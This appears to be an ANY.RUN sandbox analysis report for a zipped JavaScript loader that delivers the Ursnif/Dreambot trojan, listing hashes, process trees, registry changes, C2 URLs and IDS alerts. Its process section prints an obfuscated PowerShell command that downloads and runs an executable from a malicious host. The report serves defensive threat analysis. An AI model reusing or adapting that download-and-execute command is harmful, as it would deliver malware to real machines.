analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

newdoocument.doc.zip

Full analysis: https://app.any.run/tasks/ae673c2a-48fa-4bd2-91b8-b24547072257
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: April 15, 2019, 01:58:17
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
gozi
ursnif
evasion
dreambot
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

AB1FEB71209A4D65E8B1D831AA9B0660

SHA1:

74F125ACF09826EF9B558139347BE3A7E7CD0053

SHA256:

0272E27E87A8FC252F0B578352AE336CA45F7FCE0BE81739349220734FFFAED8

SSDEEP:

48:9wH6fwm3sxhDZxesPqHzsIfZw2z2Lqkq4lIGUHtDGC7VM8ZiWcdG:us3snDZxesyHzDwWQjq4lKwZdG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3452)
    • Application was dropped or rewritten from another process

      • TempoZg18.exe (PID: 3648)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2184)
    • Detected URSNIF Trojan

      • TempoZg18.exe (PID: 3648)
    • Changes the autorun value in the registry

      • explorer.exe (PID: 2036)
    • URSNIF Shellcode was detected

      • explorer.exe (PID: 2036)
    • Application was injected by another process

      • explorer.exe (PID: 2036)
    • Connects to CnC server

      • explorer.exe (PID: 2036)
    • Runs injected code in another process

      • TempoZg18.exe (PID: 3648)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2184)
      • TempoZg18.exe (PID: 3648)
      • explorer.exe (PID: 2036)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2184)
    • Starts CMD.EXE for commands execution

      • WScript.exe (PID: 2348)
      • explorer.exe (PID: 2036)
    • Executes scripts

      • WinRAR.exe (PID: 2604)
    • Checks for external IP

      • nslookup.exe (PID: 2244)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipFileName: newdoocument.doc.js
ZipUncompressedSize: 9419
ZipCompressedSize: 2609
ZipCRC: 0xbdaf35ae
ZipModifyDate: 2019:04:13 20:46:09
ZipCompression: Deflated
ZipBitFlag: -
ZipRequiredVersion: 20
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
9
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start inject winrar.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe #URSNIF tempozg18.exe no specs #URSNIF explorer.exe cmd.exe no specs nslookup.exe cmd.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2604"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\newdoocument.doc.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2348"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa2604.2040\newdoocument.doc.js" C:\Windows\System32\WScript.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3452"C:\Windows\System32\cmd.exe" /c WZyogGXBYAVORlS & p^owEr^she^lL.e^Xe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://instant-payments.ru/read.exe','%temp%oZg18.exe'); & start %temp%oZg18.exe & oRpKVOlCIauTiPDC:\Windows\System32\cmd.exeWScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2184powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://instant-payments.ru/read.exe','C:\Users\admin\AppData\Local\TempoZg18.exe'); C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3648C:\Users\admin\AppData\Local\TempoZg18.exe C:\Users\admin\AppData\Local\TempoZg18.exe
cmd.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2036C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3556cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\admin\AppData\Local\Temp\D3D6.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2244nslookup myip.opendns.com resolver1.opendns.com C:\Windows\system32\nslookup.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
nslookup
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3028cmd /C "echo -------- >> C:\Users\admin\AppData\Local\Temp\D3D6.bi1"C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
797
Read events
687
Write events
108
Delete events
2

Modification events

(PID) Process:(2604) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(2604) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(2604) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(2604) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\newdoocument.doc.zip
(PID) Process:(2604) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(2604) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(2604) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(2604) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2036) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithList
Operation:writeName:a
Value:
WinRAR.exe
(PID) Process:(2036) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithList
Operation:writeName:MRUList
Value:
a
Executable files
1
Suspicious files
5
Text files
4
Unknown types
0

Dropped files

PID
Process
Filename
Type
2184powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3F8NE51EUEIYXXERZ1J3.temp
MD5:
SHA256:
3648TempoZg18.exeC:\Users\admin\AppData\Roaming\Microsoft\Devivmgr\crypptsp.exe
MD5:
SHA256:
3556cmd.exeC:\Users\admin\AppData\Local\Temp\D3D6.bi1
MD5:
SHA256:
3028cmd.exeC:\Users\admin\AppData\Local\Temp\D3D6.bi1
MD5:
SHA256:
2036explorer.exeC:\Users\admin\AppData\Local\Temp\8519.bin
MD5:
SHA256:
2036explorer.exeC:\Users\admin\AppData\Local\Temp\CADB.bin
MD5:
SHA256:
2036explorer.exeC:\Users\admin\AppData\Roaming\state.tmp
MD5:
SHA256:
2036explorer.exeC:\Users\admin\AppData\Roaming\unverified-microdesc-consensus.tmp
MD5:
SHA256:
2036explorer.exeC:\Users\admin\AppData\Roaming\cached-certs.tmp
MD5:
SHA256:
2036explorer.exeC:\Users\admin\AppData\Roaming\cached-microdesc-consensus.tmp
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
84
DNS requests
8
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2036
explorer.exe
POST
80.80.165.93:80
http://adonis-medicine.at/images/Ca2O_2BdP_2FQi2_2B8/BbRDMWAioLgNW_2F4uvRjc/sqRYxzeyLsYh5/92PNJdNk/mzMVfb39S4YVNHIm6I03H4E/mLEPEFtE4e/NChjs5BCdNB1p4KXP/fnPrCIQlSRQ2/oIMuTEZJd2J/dxEupxY2QHaP7h/jUFahcYoIbnVjFqGIhRuN/GLtQWAiHoH5cWDYR/Q1ebuIzcUp5ebjX/8E2HcUAfNDVZXBF0/ogi8o.bmp
AL
malicious
2036
explorer.exe
POST
80.80.165.93:80
http://adonis-medicine.at/images/uLvQiXLRKQvuIc5oTso6n/oUHG1O5vkX8jJiG_/2BGO0bgrv2Cooin/N30128HKYf4TAnFdv0/rR8EFrhuH/7Y9eyTHHFZo5_2FImtsY/3sSiOYV4TuzXgt3n_2F/YXIYxqsPrtRctF99XX9cXu/UrLqsHMQKGXSG/hH8Cn134/Pk1cfZIACZrSSsrDJ1y6O3Q/N2UJO555PG/rbir255yp72zbhSzo/0mbPyCW3/C.bmp
AL
malicious
2184
powershell.exe
GET
200
91.201.175.46:80
http://instant-payments.ru/read.exe
BG
executable
502 Kb
malicious
2036
explorer.exe
GET
200
80.80.165.93:80
http://adonis-medicine.at/images/0a5GIEcLyhZAkP7/XTXaM207_2BEQIzrN7/sZO5keGxv/MXLwD27sl8KU1ocMQ1GE/Zryd_2FUpVTkucpUm68/ODoi_2BBSqUz0Uk1Ys1pWS/VTuk1xZX2BQjy/YcChJq7H/fPhrg_2FaqxMPKbwEqYBnyj/_2BajhgcEq/XTPldW7EpiAwNFsCR/tQ7jk_2BJdlE/8sPv5b5up/rCSWhIES/E.gif
AL
binary
294 b
malicious
2036
explorer.exe
GET
200
80.80.165.93:80
http://adonis-medicine.at/images/Bg9SWujYQj/ShpadoYSHw0f1YwAo/UPHOARMTjcli/1l3eE21iUKc/X8H_2Fh06VdT9_/2F_2Bh3W_2FSat2hvNg7S/7DSPSSHubvko_2Fl/5UmRt4txrvOb9lH/seoGCF7zf4n3fRLrwb/UHVlhktku/U3LVXGisDm0nJC1uC2ZA/Sw42HKmh6wKGD3wmLyi/8RUH8ynt_2Bj1S/dYBpHMTZ.avi
AL
binary
2.32 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2244
nslookup.exe
208.67.222.222:53
resolver1.opendns.com
OpenDNS, LLC
US
malicious
2184
powershell.exe
91.201.175.46:80
instant-payments.ru
ET Satelit TM - Anton Simeonov
BG
malicious
2036
explorer.exe
80.80.165.93:80
instant-payments.ru
IPKO Telecommunications LLC
AL
suspicious
2036
explorer.exe
144.76.42.50:443
Hetzner Online GmbH
DE
suspicious
2036
explorer.exe
128.31.0.39:9101
Massachusetts Institute of Technology
US
malicious
2036
explorer.exe
193.23.244.244:443
Chaos Computer Club e.V.
DE
malicious
2036
explorer.exe
54.39.66.61:443
OVH SAS
FR
suspicious
2036
explorer.exe
195.201.150.180:443
Awanti Ltd.
RU
suspicious
2036
explorer.exe
193.70.43.20:443
OVH SAS
FR
suspicious
2036
explorer.exe
87.118.83.3:9001
Keyweb AG
DE
suspicious

DNS requests

Domain
IP
Reputation
instant-payments.ru
  • 91.201.175.46
  • 62.73.70.146
  • 89.45.19.18
  • 186.87.135.97
  • 181.39.233.180
  • 196.20.111.10
  • 84.54.187.24
  • 80.80.165.93
  • 86.101.230.109
  • 194.204.25.137
malicious
11totalzaelooop11.club
unknown
resolver1.opendns.com
  • 208.67.222.222
shared
222.222.67.208.in-addr.arpa
unknown
myip.opendns.com
  • 185.217.117.168
shared
adonis-medicine.at
  • 80.80.165.93
  • 84.54.187.24
  • 196.20.111.10
  • 181.39.233.180
  • 186.87.135.97
  • 89.45.19.18
  • 62.73.70.146
  • 91.201.175.46
  • 194.204.25.137
  • 86.101.230.109
malicious

Threats

PID
Process
Class
Message
2184
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2244
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2244
nslookup.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup Domain (myip.opendns .com in DNS lookup)
2036
explorer.exe
A Network Trojan was detected
ET TROJAN Ursnif Variant CnC Beacon
2036
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2036
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP
2036
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2036
explorer.exe
A Network Trojan was detected
MALWARE [PTsecurity] W32.Dreambot HTTP
2036
explorer.exe
Misc activity
ET POLICY TLS possible TOR SSL traffic
2036
explorer.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 278
7 ETPRO signatures available at the full report
No debug info